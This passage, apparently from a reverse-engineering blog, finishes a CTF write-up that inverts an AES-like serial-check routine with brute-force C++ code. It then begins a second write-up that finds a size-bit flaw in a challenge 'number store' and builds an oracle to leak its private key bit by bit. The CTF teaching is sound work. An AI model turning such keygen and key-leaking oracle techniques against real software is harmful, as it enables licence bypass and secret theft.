    v81 = Slot->m128i_u8[3];
    uint8_t v78x = v12;
    uint8_t v79x = mul3[v10] ^ mul2[v9] ^ Slot->m128i_u8[13] ^ Slot->m128i_u8[9];
    v77.m128i_u64[0] = Slot->m128i_u8[2];
    v13 = mul2[v77.m128i_u64[0]] ^ v11;
    v14 = Slot->m128i_u8[6];
    uint8_t v80x = mul3[v14] ^ v13;
    v15 = Slot->m128i_u8[7];
    uint8_t v82x = mul3[v15] ^ mul2[v81] ^ Slot->m128i_u8[15] ^ Slot->m128i_u8[11];
    v16 = mul2[v8] ^ Slot->m128i_u8[12] ^ Slot->m128i_u8[0];
    v17 = Slot->m128i_u8[8];
    uint8_t v83x = mul3[v17] ^ v16;
    v18 = mul2[v10] ^ Slot->m128i_u8[13] ^ Slot->m128i_u8[1];
    v19 = Slot->m128i_u8[9];
    v20 = Slot->m128i_u8[14] ^ Slot->m128i_u8[2];
    uint8_t v84x = mul3[v19] ^ v18;
    v21 = mul2[v14] ^ v20;
    v22 = Slot->m128i_u8[10];
    v23 = Slot->m128i_u8[15] ^ Slot->m128i_u8[3];
    uint8_t v85x = mul3[v22] ^ v21;
    v24 = mul2[v15] ^ v23;
    v25 = Slot->m128i_u8[11];
    v26 = Slot->m128i_u8[4] ^ Slot->m128i_u8[0];
    uint8_t v86x = mul3[v25] ^ v24;
    v27 = mul2[v17] ^ v26;
    v28 = Slot->m128i_u8[12];
    v29 = Slot->m128i_u8[5] ^ Slot->m128i_u8[1];
    uint8_t v87x = mul3[v28] ^ v27;
    v30 = mul2[v19] ^ v29;
    v31 = Slot->m128i_u8[13];
    v32 = Slot->m128i_u8[6] ^ Slot->m128i_u8[2];
    uint8_t v88x = mul3[v31] ^ v30;
    v33 = mul2[v22] ^ v32;
    v34 = Slot->m128i_u8[14];
    v35 = Slot->m128i_u8[7] ^ Slot->m128i_u8[3];
    uint8_t v89x = mul3[v34] ^ v33;
    v36 = mul2[v25] ^ v35;
    v37 = Slot->m128i_u8[15];
    v38 = Slot->m128i_u8[8] ^ Slot->m128i_u8[4];
    uint8_t v90x = mul3[v37] ^ v36;
    uint8_t v7x = mul2[v28] ^ v38 ^ mul3[v7];
    v9 = mul2[v31] ^ Slot->m128i_u8[9] ^ Slot->m128i_u8[5] ^ mul3[v9];
    v39 = mul3[v77.m128i_u64[0]] ^ mul2[v34] ^ Slot->m128i_u8[10] ^ Slot->m128i_u8[6];
    v40 = mul3[v81] ^ Slot->m128i_u8[11] ^ Slot->m128i_u8[7] ^ mul2[v37];
    Slot->m128i_u8[0] = v78x;
    Slot->m128i_u8[1] = v79x;
    Slot->m128i_u8[2] = v80x;
    Slot->m128i_u8[3] = v82x;
    Slot->m128i_u8[4] = v83x;
    Slot->m128i_u8[5] = v84x;
    Slot->m128i_u8[6] = v85x;
    Slot->m128i_u8[7] = v86x;
    Slot->m128i_u8[8] = v87x;
    Slot->m128i_u8[9] = v88x;
    Slot->m128i_u8[10] = v89x;
    Slot->m128i_u8[11] = v90x;
    Slot->m128i_u8[12] = v7x;
    Slot->m128i_u8[13] = uint8_t(v9);
    Slot->m128i_u8[14] = v39;
    Slot->m128i_u8[15] = v40;
    break;
}

This time, if we take a closer look, we notice that each group of four output bytes depends on four input bytes: for example, output bytes 0, 4, 8 and 12 are all built from input bytes 0, 4, 8 and 12.

This means that you cannot brute-force byte by byte like earlier; you have to brute-force four bytes at a time... which is much more costly than what we've seen above. The only thing going for us is that we can brute-force the four groups in parallel as they are independent from each other. A thread for each should do the job.

At this stage I had already wasted a bunch of time on various bugs and stupid mistakes, so I decided to write this very simple, naive brute-force function (it's neither pretty nor fast... but I've made peace with it at this point):

void reverse_35(Slot_t &Output, Slot_t &Input) {
    uint8_t final_result[16];
    std::thread t0([Input, Output, &final_result]() mutable {
        for (uint64_t a = 0; a < 0x100; ++a) {
            for (uint64_t b = 0; b < 0x100; ++b) {
                for (uint64_t c = 0; c < 0x100; ++c) {
                    for (uint64_t d = 0; d < 0x100; ++d) {
                        Input.m128i_u8[0] = uint8_t(a);
                        Input.m128i_u8[4] = uint8_t(b);
                        Input.m128i_u8[8] = uint8_t(c);
                        Input.m128i_u8[12] = uint8_t(d);
                        round(35, &Input);
                        if (Input.m128i_u8[0] == Output.m128i_u8[0] && Input.m128i_u8[4] == Output.m128i_u8[4] &&
                            Input.m128i_u8[8] == Output.m128i_u8[8] && Input.m128i_u8[12] == Output.m128i_u8[12]) {

                            final_result[0] = uint8_t(a);
                            final_result[4] = uint8_t(b);
                            final_result[8] = uint8_t(c);
                            final_result[12] = uint8_t(d);
                            return;
                        }
                    }
                }
            }
        }
    });
    std::thread t1([Input, Output, &final_result]() mutable {
        for (uint64_t a = 0; a < 0x100; ++a) {
            for (uint64_t b = 0; b < 0x100; ++b) {
                for (uint64_t c = 0; c < 0x100; ++c) {
                    for (uint64_t d = 0; d < 0x100; ++d) {
                        Input.m128i_u8[1] = uint8_t(a);
                        Input.m128i_u8[5] = uint8_t(b);
                        Input.m128i_u8[9] = uint8_t(c);
                        Input.m128i_u8[13] = uint8_t(d);
                        round(35, &Input);
                        if (Input.m128i_u8[1] == Output.m128i_u8[1] && Input.m128i_u8[5] == Output.m128i_u8[5] &&
                            Input.m128i_u8[9] == Output.m128i_u8[9] && Input.m128i_u8[13] == Output.m128i_u8[13]) {

                            final_result[1] = uint8_t(a);
                            final_result[5] = uint8_t(b);
                            final_result[9] = uint8_t(c);
                            final_result[13] = uint8_t(d);
                            return;
                        }
                    }
                }
            }
        }
    });
    std::thread t2([Input, Output, &final_result]() mutable {
        for (uint64_t a = 0; a < 0x100; ++a) {
            for (uint64_t b = 0; b < 0x100; ++b) {
                for (uint64_t c = 0; c < 0x100; ++c) {
                    for (uint64_t d = 0; d < 0x100; ++d) {
                        Input.m128i_u8[2] = uint8_t(a);
                        Input.m128i_u8[6] = uint8_t(b);
                        Input.m128i_u8[10] = uint8_t(c);
                        Input.m128i_u8[14] = uint8_t(d);
                        round(35, &Input);
                        if (Input.m128i_u8[2] == Output.m128i_u8[2] && Input.m128i_u8[6] == Output.m128i_u8[6] &&
                            Input.m128i_u8[10] == Output.m128i_u8[10] && Input.m128i_u8[14] == Output.m128i_u8[14]) {

                            final_result[2] = uint8_t(a);
                            final_result[6] = uint8_t(b);
                            final_result[10] = uint8_t(c);
                            final_result[14] = uint8_t(d);
                            return;
                        }
                    }
                }
            }
        }
    });
    std::thread t3([Input, Output, &final_result]() mutable {
        for (uint64_t a = 0; a < 0x100; ++a) {
            for (uint64_t b = 0; b < 0x100; ++b) {
                for (uint64_t c = 0; c < 0x100; ++c) {
                    for (uint64_t d = 0; d < 0x100; ++d) {
                        Input.m128i_u8[3] = uint8_t(a);
                        Input.m128i_u8[7] = uint8_t(b);
                        Input.m128i_u8[11] = uint8_t(c);
                        Input.m128i_u8[15] = uint8_t(d);
                        round(35, &Input);
                        if (Input.m128i_u8[3] == Output.m128i_u8[3] && Input.m128i_u8[7] == Output.m128i_u8[7] &&
                            Input.m128i_u8[11] == Output.m128i_u8[11] && Input.m128i_u8[15] == Output.m128i_u8[15]) {

                            final_result[3] = uint8_t(a);
                            final_result[7] = uint8_t(b);
                            final_result[11] = uint8_t(c);
                            final_result[15] = uint8_t(d);
                            return;
                        }
                    }
                }
            }
        }
    });

    t0.join();
    t1.join();
    t2.join();
    t3.join();
    memcpy(Input.m128i_u8, final_result, 16);
    return;
}

Each thread recovers four bytes and the results are aggregated in final_result, easy.

case 4, 8, 12, 16, 20, 24, 28, 32, 36: AddRoundKey

This case is another trivial one where a simple XOR does the job to invert the operation:

case 4:
case 8:
case 12:
case 16:
case 20:
case 24:
case 28:
case 32:
case 36: {
    *Slot = _mm_xor_si128(_mm_load_si128(Slot), mask3);
    break;
}

Note that mask3 is one of the arrays that gets modified when you introduce an abnormal delay in a round, as when you're debugging for example. Yet another spot where wrong results could be produced :).

void reverse_36(Slot_t &Output, Slot_t &Input) {
    Input = _mm_xor_si128(_mm_load_si128(&Output), mask3);
}

case 39: decoding

And finally our last case is another very simple one:

case 39: {
    *Slot = _mm_xor_si128(_mm_load_si128(Slot), shiftedmask);
    break;
}

Inverted with the below:

void reverse_39(Slot_t &Output, Slot_t &Input) {
    Input = _mm_xor_si128(_mm_load_si128(&Output), shiftedmask);
}

unround

At this stage we have all the small blocks we need to find an input state that generates a specific output state. We simply combine all the reverse_ routines we wrote into an unround function that inverts a single round, and a utility function that applies forty unrounds to a state, from bottom to top, to fully invert schedule.
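
For reference, here is a minimal sketch of what my unround dispatcher could look like, assuming each class of rounds shares its tables (which reusing round(35) and round(38) inside the reverse_ helpers already relies on); reverse_0 is a hypothetical name for the inverse of the very first case covered earlier:

void unround(const uint32_t nround, Slot_t &Output, Slot_t &Input) {
    if (nround == 0) {
        // Hypothetical name for the first case's inverse (covered earlier).
        reverse_0(Output, Input);
    } else if (nround == 39) {
        reverse_39(Output, Input);
    } else {
        switch (nround % 4) {
            case 1: reverse_37(nround, Output, Input); break; // SubBytes-like
            case 2: reverse_38(Output, Input); break;         // ShiftRows-like
            case 3: reverse_35(Output, Input); break;         // MixColumns-like
            case 0: reverse_36(Output, Input); break;         // AddRoundKey-like
        }
    }
}

And the utility that chains forty of those: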

void recover_state(Slot_t &Output, Slot_t &Input) {
    for (int32_t i = 39; i > -1; --i) {
        unround(i, Output, Input);
        memcpy(Output.m128i_u8, Input.m128i_u8, 16);
    }
}

Once we have that available, we can use it to try to find, let's say, the input bytes that generate the following output: 'doar-e.github.io'.encode('hex').

void recover_doare() {
    const uint8_t WantedOutputBytes[16] {
        // In [17]: ', '.join('0x%2x' % ord(c) for c in 'doar-e.github.io')
        // Out[17]: '0x64, 0x6f, 0x61, 0x72, 0x2d, 0x65, 0x2e, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2e, 0x69, 0x6f'
        0x64, 0x6f, 0x61, 0x72, 0x2d, 0x65, 0x2e, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2e, 0x69, 0x6f
    };
    Slot_t WantedOutput, Input;
    memcpy(WantedOutput.m128i_u8, WantedOutputBytes, 16);
    recover_state(WantedOutput, Input);
    hexdump(stdout, Input.m128i_u8, 16);
}

This gives us back the following (it takes about 7 min on my machine vs 13 min without the multi-threaded version of reverse_35):

0000:   0D CC 49 C2 F8 E1 6A 78   1D 57 26 F7 45 AB 3E 13    ..I...jx.W&.E.>.

To ensure that it works properly we can fire up gdb and inject this state right before the scheduling phase like in the below:

gef➤  pie breakpoint *0x114c
gef➤  pie run
[...]
gef➤  eb &states 0x0D 0xCC 0x49 0xC2 0xF8 0xE1 0x6A 0x78 0x1D 0x57 0x26 0xF7 0x45 0xAB 0x3E 0x13
gef➤  x/16bx &states
0x555556257660 <states>:        0x0d    0xcc    0x49    0xc2    0xf8    0xe1    0x6a    0x78
0x555556257668 <states+8>:      0x1d    0x57    0x26    0xf7    0x45    0xab    0x3e    0x13
gef➤  x/i $rip
=> 0x55555555514c <main+1276>:  call   0x555555555660 <_Z8schedulev>
gef➤  n
gef➤  x/i $rip
=> 0x555555555151 <main+1281>:  movdqa xmm0,XMMWORD PTR [rip+0xd02517]        # 0x555556257670 <states+16>
gef➤  x/16bx &states
0x555556257660 <states>:        0x64    0x6f    0x61    0x72    0x2d    0x65    0x2e    0x67
0x555556257668 <states+8>:      0x69    0x74    0x68    0x75    0x62    0x2e    0x69    0x6f
gef➤  x/1s &states
0x555556257660 <states>:        "doar-e.github.iovطL:2\204\274\006\"A\377+ⴄ\256^\264)\220\024\307\356dO\377a\003Q}\317+\352\064\303I\300\254\256\271\061\306\004\327\033\375\307B\357\375m\027u\024\060\315t\a\034\247\224\027\005\202\021oK\366\267>\373X`?\027\071*\333\301\357\a\260\256\063k}u\232f\212\212\246'\303j\027\201\061@\246\336\304mۡ\bSi\214\034\210D\327.hQ\310\302I,\225zF\263안vطL:2\204\274\006\"A\377+ⴄ\256^\264)\220\024\307\356dO\377a\003Q}\317+\352\064\303I\300\254\256\271\061\306\004\327\033\375\307B\357\375m\027u\024\060\315t\a\034\247\224\027\005\202\021oK\366\267>\373X`?\027\071*\333\301\357\a\260\256\063k}u\232f\212\212\246'\303j\233\004WD\345\037\360\371\350JT\332h\340R\270\223\256\247\356͚C\211\374\327=\022>\222\301\346 \031\313]\272\274=t\302>:\245qZ\363[\223\256\247\356\211͚C=\022\374ג\301\346>"

All right, awesome. Sounds like we are done with schedule for now :).

How do I win now?

From above, we already established that the fifteen state blobs get XOR'ed together, and that if the result is 0x42424242696969693737373713131313 then it's a win, great. We also know that the input serial is diffused into those fifteen blobs: each blob contains all the bytes of the serial input, just mixed in differently depending on which blob it is. What this means is that when we feed a serial to the program, we fully control only one of those blobs. And as they are all XOR'ed together, it's unclear at first sight how we can get the resulting XOR equal to the magic value, strange.

After being stuck on this for a bit (and still being mad at myself for it D:), my friend mongo asked me if I had really taken a look at what the fifteen blobs look like. Ugh, I guess I kinda did? At this point I fired up my debugger and dumped the below fifteen blobs (for the following serial 00112233445566778899AABBCCDDEEFF):

gef➤  pie breakpoint *0x114c
gef➤  pie run
gef➤  x/240bx &states
0x555556257660 <states>:        0x66    0xcc    0x33    0x55    0x88    0xee    0x77    0x00    0xdd    0x22    0x99    0x11    0xff    0xbb    0x44    0xaa
0x555556257670 <states+16>:     0xff    0xcc    0x66    0xaa    0x99    0x55    0x22    0x00    0x77    0x11    0x88    0xbb    0xdd    0x33    0xee    0x44
0x555556257680 <states+32>:     0xaa    0x33    0xdd    0xcc    0x66    0xee    0x11    0x44    0xbb    0x55    0x77    0xff    0x22    0x00    0x88    0x99
0x555556257690 <states+48>:     0xaa    0x55    0x33    0x11    0xbb    0xdd    0x66    0xcc    0x22    0xff    0x44    0x88    0xee    0x77    0x99    0x00
0x5555562576a0 <states+64>:     0x00    0x66    0xbb    0x77    0xff    0x55    0x88    0x33    0x11    0x44    0x99    0x22    0xcc    0xdd    0xaa    0xee
0x5555562576b0 <states+80>:     0x22    0x00    0x33    0xbb    0xcc    0x88    0x44    0xdd    0x77    0x55    0xaa    0x11    0x66    0xff    0xee    0x99
0x5555562576c0 <states+96>:     0xcc    0xff    0x00    0x44    0xbb    0x66    0xaa    0x11    0x99    0x55    0xee    0x33    0x22    0x77    0x88    0xdd

0x5555562576d0 <states+112>:    0x00    0x44    0x88    0xcc    0x11    0x55    0x99    0xdd    0x22    0x66    0xaa    0xee    0x33    0x77    0xbb    0xff

0x5555562576e0 <states+128>:    0x66    0xcc    0x33    0x55    0x88    0xee    0x77    0x00    0xdd    0x22    0x99    0x11    0xff    0xbb    0x44    0xaa
0x5555562576f0 <states+144>:    0xff    0xcc    0x66    0xaa    0x99    0x55    0x22    0x00    0x77    0x11    0x88    0xbb    0xdd    0x33    0xee    0x44
0x555556257700 <states+160>:    0xaa    0x33    0xdd    0xcc    0x66    0xee    0x11    0x44    0xbb    0x55    0x77    0xff    0x22    0x00    0x88    0x99
0x555556257710 <states+176>:    0xaa    0x55    0x33    0x11    0xbb    0xdd    0x66    0xcc    0x22    0xff    0x44    0x88    0xee    0x77    0x99    0x00
0x555556257720 <states+192>:    0x00    0x66    0xbb    0x77    0xff    0x55    0x88    0x33    0x11    0x44    0x99    0x22    0xcc    0xdd    0xaa    0xee
0x555556257730 <states+208>:    0x22    0x00    0x33    0xbb    0xcc    0x88    0x44    0xdd    0x77    0x55    0xaa    0x11    0x66    0xff    0xee    0x99
0x555556257740 <states+224>:    0xcc    0xff    0x00    0x44    0xbb    0x66    0xaa    0x11    0x99    0x55    0xee    0x33    0x22    0x77    0x88    0xdd

Do you see it now? If you look closely, you can see that states[0] = states[8], states[1] = states[9], states[2] = states[10], etc. Which means that XORing them together cancels them out... leaving the one blob in the middle: states[7].

0x5555562576d0 <states+112>:    0x00    0x44    0x88    0xcc    0x11    0x55    0x99    0xdd    0x22    0x66    0xaa    0xee    0x33    0x77    0xbb    0xff
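
If you want to convince yourself of the cancellation, here is a quick sanity check (a sketch assuming a states[15] array of Slot_t like in the target): XORing the fifteen blobs together leaves exactly states[7].

Slot_t acc;
memset(&acc, 0, sizeof(acc));
for (size_t i = 0; i < 15; ++i) {
    acc = _mm_xor_si128(acc, _mm_load_si128(&states[i]));
}
// acc == states[7] because states[i] == states[i + 8] for i in [0, 6].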

So now we just have to invoke recover_state in order to find an input state that generates this output state: 42424242696969693737373713131313. Once we have recovered the sixteen input bytes, we need to study the diffusion algorithm a little to be able to construct an input serial that generates the states[7] of our choice (slot2password), easy.
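
For what it's worth, the diffusion visible in the dump above looks like a simple 4x4 transpose: states[7][i] comes from serial[4 * (i % 4) + i / 4]. So a slot2password along these lines should do the job (a sketch, not necessarily my exact code):

void slot2password(const uint8_t Slot[16], uint8_t Password[16]) {
    for (size_t i = 0; i < 16; ++i) {
        // Invert the transpose: send slot byte i back to its spot in the serial.
        Password[4 * (i % 4) + (i / 4)] = Slot[i];
    }
}

Putting it all together: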

void pwn() {
    const uint8_t WantedOutputBytes[16] {
        0x13, 0x13, 0x13, 0x13, 0x37, 0x37, 0x37, 0x37, 0x69, 0x69, 0x69, 0x69, 0x42, 0x42, 0x42, 0x42,
    };
    Slot_t WantedOutput, Input;
    memcpy(WantedOutput.m128i_u8, WantedOutputBytes, 16);
    recover_state(WantedOutput, Input);
    hexdump(stdout, Input.m128i_u8, 16);
    uint8_t Password[16];
    slot2password(Input.m128i_u8, Password);
    for (size_t i = 0; i < 16; ++i) {
        printf("%.2X", Password[i]);
    }
    printf("\n");
}

And after running this for a bit of time we get the below output:

c:\work>C:\work\unboxin-ctf2.exe
0000:   0A 0E C2 74 B7 C6 41 70   98 5F 2D D7 2C C9 52 68    ...t..Ap._-.,.Rh
0AB7982C0EC65FC9C2412D527470D768
7 min elapsed

Mandatory final check now...:

over@bubuntu:~/workz$ ./ctf2 0AB7982C0EC65FC9C2412D527470D768
**** Login Successful ****

Job done :-).

Conclusion

Interestingly, while I was writing up this article, Ledger posted one describing the puzzles and some of the solutions they received. You should definitely check it out: CTF complete - HW bounty still ongoing. The other interesting thing is that, as usual, there are many ways leading to victory.

What's fascinating is that, in this specific case, studying the cryptography closer allowed some people to directly extract the AES key. At that point writing a solution becomes trivial: decrypt a blob with AES and the extracted key. No need to reimplement any of the program's logic. That's very cool! But there's been an even richer spectrum of solutions: fault injection, side-channel attacks, reverse-engineering, etc. That's also why I would definitely recommend going and reading other people's solutions :).

In any case, I've uploaded my solution file unboxin-ctf2.cc on my github as usual, enjoy!

Last but not least, special thanks to my mates yrp604 and mongo for proofreading and edits :)

beVX challenge on the operation table

Introduction

About two weeks ago, my friend mongo challenged me to solve a reverse-engineering puzzle put up by the SSD team for OffensiveCon2018 (a security conference that took place in Berlin in February). The challenge binary is available for download here, and here is one of the original tweets advertising it.

With this challenge, you are tasked with reverse-engineering a binary providing some sort of encryption service, and there is supposedly a private key (aka the flag) to retrieve. A remote server running the challenge is also available for you to carry out your attack. This looked pretty interesting as it was different from the usual keygen-me type of reverse-engineering challenge.

Unfortunately, I didn't get a chance to play with this while the remote server was up (the organizers took it down once they received the solutions of the three winners). However, the cool thing is that you can easily manufacture your own server to play at home... which is what I ended up doing.

As I thought the challenge was cute enough, and I would also like to write on a more regular basis, here is a small write-up describing how I abused the server to get the private key out. Hope you don't find it too boring :-).

Playing at home

Before I start walking you through my solution, here is a very simple way for you to set it up at home. You just have to download a copy of the binary here, and create a fake encryption library that exports the encrypt/decrypt routines as well as the key material (private_key / private_key_length):

#include <stdio.h>
#include <stdint.h>
#include <inttypes.h>

uint32_t number_of_rows = 16;
uint32_t private_key_length = 32;
uint8_t private_key[32] = { 1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 0 };

const uint64_t k = 0xba0bab;

uint64_t decrypt(uint64_t x) {
    printf("decrypt(%" PRIx64 ") = %" PRIx64 "\n", x, x ^ k);
    return x ^ k;
}

uint64_t encrypt(uint64_t y) {
    printf("encrypt(%" PRIx64 ") = %" PRIx64 "\n", y, y ^ k);
    return y ^ k;
}

The above file can be compiled with the below command:

$ clang++ -shared -o lib.so -fPIC lib.cc

Dropping the resulting lib.so shared library file inside the same directory as the challenge should be enough to have it properly run. You can even hook it up to a socket via socat to simulate a remote server you have to attack:

$ socat -vvv TCP-LISTEN:31337,fork,reuseaddr EXEC:./cha1

If everything worked as advertised, you should now be able to interact with the challenge remotely and be greeted by the below menu when connected to it:

Please choose your option:
0. Store Number
1. Get Number
2. Add
3. Subtract
4. Multiply
5. Divide
6. Private Key Encryption
7. Binary Representation
8. Exit

Off you go have fun now :)

Recon

When I start looking at a challenge I always spend time understanding a bit more of the story around it. This both gives me direction and helps me identify pitfalls. For example here, the story tells me that we have a secret to exfiltrate, so focusing the analysis on the code interacting with / managing this secret sounds like a good idea. The challenge was also advertised as a reverse-engineering task, so I didn't really expect any pwning. A logical flaw, a design issue, or a very constrained memory corruption type of issue is what I was looking for.

recon.png

Once base64-decoded, the binary is a small (10KB) unprotected ELF64. It is PIE and imports a bunch of data / functions from a file named lib.so that we don't have access to. Based on the story we have been given, we can expect both the key material and the encryption / decryption routines to be stored there.

extern:0000000000202798 ; _QWORD __cdecl decrypt(unsigned __int64)
extern:0000000000202798                 extrn _Z7decryptm:near  ; DATA XREF: .got.plt:off_202020↑o
extern:00000000002027A0 ; _QWORD __cdecl encrypt(unsigned __int64)
extern:00000000002027A0                 extrn _Z7encryptm:near  ; DATA XREF: .got.plt:off_202028↑o

Even though the challenge seems to use C++ and the STL, the disassembled / decompiled code is very easy to read so it doesn't take a whole lot of time to understand a bit more what this thing is doing.

According to what the menu says, it looks like a store of numbers, whatever that means. Quick reverse-engineering of the getter and setter functions teaches us a bit more about what a number is. First, every number (number_t) being stored is encrypted when inserted into the store, and decrypted when retrieved out of the store.

uint64_t write_number_to_store(number_t *number2write, uint64_t value, bool encrypted)
{
    uint64_t encrypted_val = value;
    if(encrypted) {
        encrypted_val = encrypt(value);
    }

    size_t bitidx = 31LL;
    do
    {
        uint8_t curr_encrypted_val = encrypted_val;
        encrypted_val >>= 1;
        number2write->bytes[bitidx--] = curr_encrypted_val & 1;
    } while ( bitidx != -1 );
    return encrypted_val;
}

Interestingly, the third argument of the function allows you to write a clear-text number into the store, but it is apparently not used anywhere in the challenge... oh well :)

Once the numbers are encrypted, they also get encoded with a very simple transformation: every bit is written out to its own byte (0 or 1). As the numbers being stored are 32-bit integers, the store naturally needs 32 bytes per number.

00000000 number_t        struc ; (sizeof=0x20)
00000000 bytes           db 32 dup(?)
00000020 number_t        ends
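
For completeness, the getter (read_number_from_store, which the encryption loop below relies on) does the reverse: it reassembles the 32 bit-bytes and decrypts the result. A minimal sketch of what the decompiled code amounts to (names and exact shape assumed):

uint64_t read_number_from_store(const number_t *number2read, uint64_t *value) {
    uint64_t encrypted_val = 0;
    // write_number_to_store stores the least significant bit at index 31, so
    // walking the bytes from 0 to 31 rebuilds the value MSB first.
    for (size_t bitidx = 0; bitidx < 32; ++bitidx) {
        encrypted_val = (encrypted_val << 1) | (number2read->bytes[bitidx] & 1);
    }
    *value = decrypt(encrypted_val);
    return *value;
}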

After looking a bit more at the other options, and with the above in mind, it is pretty straightforward to recover part of the structure that keeps the global state of the store (state_t). The store has a maximum capacity of 32 slots, and the current size of the store is kept in the lower 5 bits (2**5 = 32) of some sort of status variable. At this point I started drafting the structure state_t:

00000000 state_t         struc ; (sizeof=0x440, align=0x8)
00000000 numbers         number_t 32 dup(?)
00000400 pkey            dq ?
00000408 size            db ?
00000409                 db ? ; undefined
0000040A                 db ? ; undefined
0000040B                 db ? ; undefined
0000040C                 db ? ; undefined
0000040D                 db ? ; undefined
0000040E                 db ? ; undefined
0000040F                 db ? ; undefined
00000410 x               dw ?
00000412 xx              db 38 dup(?)
00000438 xxx             dq ?
00000440 state_t         ends

The Private Key Encryption function is the one that looked a bit more involved than the others. But as far as I was concerned, it was doing "arithmetic" on numbers that you previously stored: one called the message and one called the key.

Before actually starting to look for issues, I needed to answer two questions:

  1. Where is the key stored?
  2. What prevents me from accessing it?

By looking at the store initialization code we can answer the first question. The content of private_key is put inside the store in slot number_of_rows + 2. Right after, the size of the store is set to number_of_rows. The net result of this operation, assuming proper bounds-checking from all the commands interacting with the store, is that the user cannot access the key directly.

Finding the needle: getting access to the key material

Fortunately for us there's not that much code, so auditing every command is easy enough. All the commands actually do a good job at sanitizing things, at first sight. Every time the application asks for a slot index, it is bounds-checked against the store size before getting used. It even throws an out-of-range exception if you try to access an out-of-bounds slot. Here is an example with the divide operation (number_store is the global state, NumberOfNumbers is a mask extracting the lower 5 bits of the size field to compute the current size of the store):

const uint32_t NumberOfNumbers = 0x1F;
case Divide:
    arg1_row = 0LL;
    arg2_row = 0LL;
    result_row = 0LL;
    std::cout << "Enter row of arg1, row of arg2 and row of result" << std::endl;
    std::cin >> arg1_row;
    std::cin >> arg2_row;
    std::cin >> result_row;
    store_size = number_store->size & NumberOfNumbers;
    if(arg1_row >= store_size || arg2_row >= store_size || result_row >= store_size)
        goto OutOfRange;

There's a catch though. If we look closer at every instance of code that interacts with the size field of the store, there is something a bit weird going on.

catchme.png

In the above screenshot you can see that the highlighted cross-reference looks a bit odd, as it is actually changing the size by setting bit number three (0b1000). If we pull the code for this function we can see the below:

case PrivateKeyEncryption:
    number_store->size |= 8u;
    msg_row = 0uLL;
    key_row = 0uLL;
    std::cout << "Enter row of message, row of key" << std::endl;
    std::cin >> msg_row;
    std::cin >> key_row;
    store_size = number_store->size & NumberOfNumbers;
    if(msg_row >= store_size || key_row >= store_size) {
        number_store->size &= 0xF7u;
        std::cout << "Row number is out of range" << std::endl;

I completely overlooked this detail at first, as this bit is properly cleared out on error (with the 0xF7 mask). This bit also sounded like it was used as a switch to start or stop the encryption process. I could clearly see it used in the encryption loop like in the below:

while(number_store->size & 8) {
    // do stuff
    std::cout << "Continue Encryption? (y/n)" << std::endl;
    std::cin >> continue_enc;
    if(continue_enc == 'Y' || continue_enc == 'y') {
        // do encryption..stuff
    } else if(continue_enc == 'n' || continue_enc == 'N') {
        number_store->size &= 0xF7u;
    }

The thing is, this bit is part of the lower 5 bits encoding the store size, so setting it also means that we can now access slots from index 0 up to slot 0x10|8 = 0x18. If the previous is a bit confusing, consider the following C structure:

union {
    struct {
        size_t x : 3;
        size_t bit3 : 1;
    } s1;
    size_t store_size : 5;
} size = {};

And as we said a bit earlier, the key material is stored in slot number_of_rows + 2 = 0n18.

__int64 realmain(struct_buffer *number_store) {
    nrows = number_of_rows;
    pkey_length = private_key_length;
    pkey = &number_store->numbers[number_of_rows + 2];
    is_pkey_empty = private_key_length == 0;
    number_store->pkey = pkey;
    if(!is_pkey_empty) {
        memmove(pkey, &private_key, pkey_length);
    }
    number_store->pkey->bytes[pkey_length - 1] |= 1u;
    number_store->size = nrows & 0x1F | number_store->size & 0xE0;
    // ...

Cool beans, I guess we now have a way to make the application interact with the slot containing the private key, which sounds like... progress, right?

Bending the needle: building an oracle

Being able to access the key through the private key encryption feature is great, but it also doesn't give us much just yet. We need to understand a bit more about what this feature is doing before coming up with a way to abuse it. After spending a bit of time reverse-engineering and debugging it, I've broken down its logic into the below steps:

  1. The user enters the slot of the message and the slot of the key (either or both of these slots can be the private key slot),
  2. The number stored into the key slot is copied into the global state; in a field I called keycpy,
  3. Another field in the global state is initialized to 1; I called this one magicnumber,
  4. The actual encryption process consists of: multiplying the magicnumber by itself, and multiplying it by the number in the slot of the message (that you previously entered) if the current byte of the key is a one. If the current key byte is a zero then nothing extra happens (see below),
  5. Once the encryption is done or stopped by the user, the resulting magicnumber is stored back inside the message slot (overwriting its previous content).

The prettified code looks like this:

while(number_store->size & 8) {
    // do stuff
    std::cout << "Continue Encryption? (y/n)" << std::endl;
    std::cin >> continue_enc;
    if(continue_enc == 'Y' || continue_enc == 'y') {
        number_store->magicnumber *= number_store->magicnumber;
        if(number_store->keycpy[idx] == 1) {
            uint64_t msg = 0;
            read_number_from_store(&number_store->numbers[msg_slot & 0x7F], &msg);
            number_store->magicnumber *= msg;
        }
    } else if(continue_enc == 'n' || continue_enc == 'N') {
        number_store->size &= 0xF7u;
    }
}

As you might have figured, we basically have two avenues (technically three I guess... but one is clearly useless :-D): either we load the private key as the message, or we load it as the key parameter.

If we do the former, based on the encryption logic, we end up with no real control over the way the magicnumber is going to be computed. Keep in mind the numbers in the store are all encrypted with the encrypt function, and when the key is retrieved out of the store it isn't decrypted (it is not a normal get operation) but just memcpy'd to the keycpy field like in the below:

memmove(number_store->keycpy, &number_store->numbers[keyslot], 32);

So even if we can insert a known value in the store, we wouldn't really know what it would look like once encrypted.

If we load the private key as the key though, we now have... an oracle! As the user can stop the encryption process whenever they want, the attack could work as follows (assuming you would like to leak one byte of the private key):

  1. Load the value 3 in the slot 0,
  2. Use the private key encryption feature with key slot 18 (where the private key is written at) and message slot 0 (where we loaded the value 3),
  3. Depending on the value of the current byte of the key, the value of magicnumber will either be (1*1)*3=3 or (1*1)=1. If the user then stops the encryption, this number is written into the store in slot 0,
  4. Get the value in slot 0. If the value is 3 then the key byte was a 1, else it was a 0.

Following this little recipe allows us to leak bit n which, once done, allows us to push the encryption one round further and leak bit n + 1... and so on and so forth.

This is great, but there are still two small details we need to iron out before carrying the attack properly.

The code that runs before the actual encryption scans the keycpy and skips any leading zeros. This means that if the key were 0b00010101 for example, the actual encryption logic we described above would start after skipping the first three leading zeros. In order to know how many of those exist, we can just trigger the private key encryption feature and encrypt... until we cannot anymore (there are only 32 bytes per number so at most you get 32 rounds). You just have to count how many rounds you went through, and the difference from 32 is the number of leading zeros.

